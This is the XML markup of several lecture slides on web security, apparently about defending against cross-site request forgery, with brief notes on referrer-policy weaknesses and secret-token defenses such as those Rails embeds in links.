                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="715963">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="715963"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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88070" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E198DAE7-10DD-0546-A569-9B853958B507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="504825" y="7315200"/>
            <a:ext cx="2676525" cy="161925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3459479"/>
              <a:gd name="T1" fmla="*/ 819 h 202565"/>
              <a:gd name="T2" fmla="*/ 0 w 3459479"/>
              <a:gd name="T3" fmla="*/ 647 h 202565"/>
              <a:gd name="T4" fmla="*/ 25 w 3459479"/>
              <a:gd name="T5" fmla="*/ 395 h 202565"/>
              <a:gd name="T6" fmla="*/ 93 w 3459479"/>
              <a:gd name="T7" fmla="*/ 189 h 202565"/>
              <a:gd name="T8" fmla="*/ 192 w 3459479"/>
              <a:gd name="T9" fmla="*/ 51 h 202565"/>
              <a:gd name="T10" fmla="*/ 316 w 3459479"/>
              <a:gd name="T11" fmla="*/ 0 h 202565"/>
              <a:gd name="T12" fmla="*/ 11912 w 3459479"/>
              <a:gd name="T13" fmla="*/ 0 h 202565"/>
              <a:gd name="T14" fmla="*/ 12035 w 3459479"/>
              <a:gd name="T15" fmla="*/ 51 h 202565"/>
              <a:gd name="T16" fmla="*/ 12135 w 3459479"/>
              <a:gd name="T17" fmla="*/ 189 h 202565"/>
              <a:gd name="T18" fmla="*/ 12202 w 3459479"/>
              <a:gd name="T19" fmla="*/ 395 h 202565"/>
              <a:gd name="T20" fmla="*/ 12227 w 3459479"/>
              <a:gd name="T21" fmla="*/ 647 h 202565"/>
              <a:gd name="T22" fmla="*/ 12227 w 3459479"/>
              <a:gd name="T23" fmla="*/ 819 h 202565"/>
              <a:gd name="T24" fmla="*/ 12202 w 3459479"/>
              <a:gd name="T25" fmla="*/ 1070 h 202565"/>
              <a:gd name="T26" fmla="*/ 12135 w 3459479"/>
              <a:gd name="T27" fmla="*/ 1276 h 202565"/>
              <a:gd name="T28" fmla="*/ 12035 w 3459479"/>
              <a:gd name="T29" fmla="*/ 1414 h 202565"/>
              <a:gd name="T30" fmla="*/ 11912 w 3459479"/>
              <a:gd name="T31" fmla="*/ 1465 h 202565"/>
              <a:gd name="T32" fmla="*/ 316 w 3459479"/>
              <a:gd name="T33" fmla="*/ 1465 h 202565"/>
              <a:gd name="T34" fmla="*/ 192 w 3459479"/>
              <a:gd name="T35" fmla="*/ 1414 h 202565"/>
              <a:gd name="T36" fmla="*/ 93 w 3459479"/>
              <a:gd name="T37" fmla="*/ 1276 h 202565"/>
              <a:gd name="T38" fmla="*/ 25 w 3459479"/>
              <a:gd name="T39" fmla="*/ 1070 h 202565"/>
              <a:gd name="T40" fmla="*/ 0 w 3459479"/>
              <a:gd name="T41" fmla="*/ 819 h 2025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59479" h="202565">
                <a:moveTo>
                  <a:pt x="0" y="112833"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="89156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="54452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26113" y="26113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54452" y="7006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3370224" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3404926" y="7006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3433265" y="26113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3452372" y="54452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3459378" y="89156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3459378" y="112833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3452372" y="147536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3433265" y="175876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3404926" y="194983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3370224" y="201989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89156" y="201989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54452" y="194983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26113" y="175876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="147536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="112833"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25400">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61FEADC-0757-E74D-86FC-0B324BFBF070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="1816100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28526" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5900" spc="10" dirty="0"/>
              <a:t>Lenient </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="120" dirty="0"/>
              <a:t>policy </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="5" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="-190" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insecure</a:t>
            </a:r>
            <a:endParaRPr sz="5900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E889C973-6A35-3B40-9188-3EA776F3E689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="354012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B0122195-6E1F-4B47-BFDF-670EBEF65915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="3486150"/>
            <a:ext cx="6262688" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>force removal </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>referrer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1F88EE-A4F0-DF4C-ACBC-EE5409E5F258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="411003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AE26BF84-0802-FC45-B9CD-FE76BA929560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="467995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269A3A50-C7BB-3949-8089-6FD610611EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="4057650"/>
            <a:ext cx="7113588" cy="984250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exploit browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>remove</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Man-in-the-middle </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="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D8B9DE8-3331-9A43-B8B0-FC316FED0C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="76200"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="370826" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-5" dirty="0"/>
              <a:t>Secret</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:endParaRPr sz="6100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B66B9A41-5C4A-614C-BABE-65C9402D5656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092200" y="2228850"/>
            <a:ext cx="8661400" cy="1970088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469876" indent="-457200" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Include a secret token in every link/form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923901" lvl="1"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Can use a hidden form field, custom HTTP header, or encode it directly in the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923901" lvl="1"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Must not be guessable value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="923901" lvl="1"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Can be same  as session ID sent in cookie</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF356DEF-6430-7E4E-829A-722CBD45F845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588963" y="5029200"/>
            <a:ext cx="8307387" cy="1816100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469876" indent="-457200" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Framework helps: Ruby on Rails embeds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>     secret in every link automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" b="1" spc="5" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>http://website.com/doStuff.html?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=81asdf97er8ef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C5500286-03A7-054E-A683-AB1B189E38AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="223838"/>
            <a:ext cx="7578725" cy="484187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82759" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3100" spc="265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-88" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-221" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-221" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="409" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="177" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>age</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="409" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>TT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
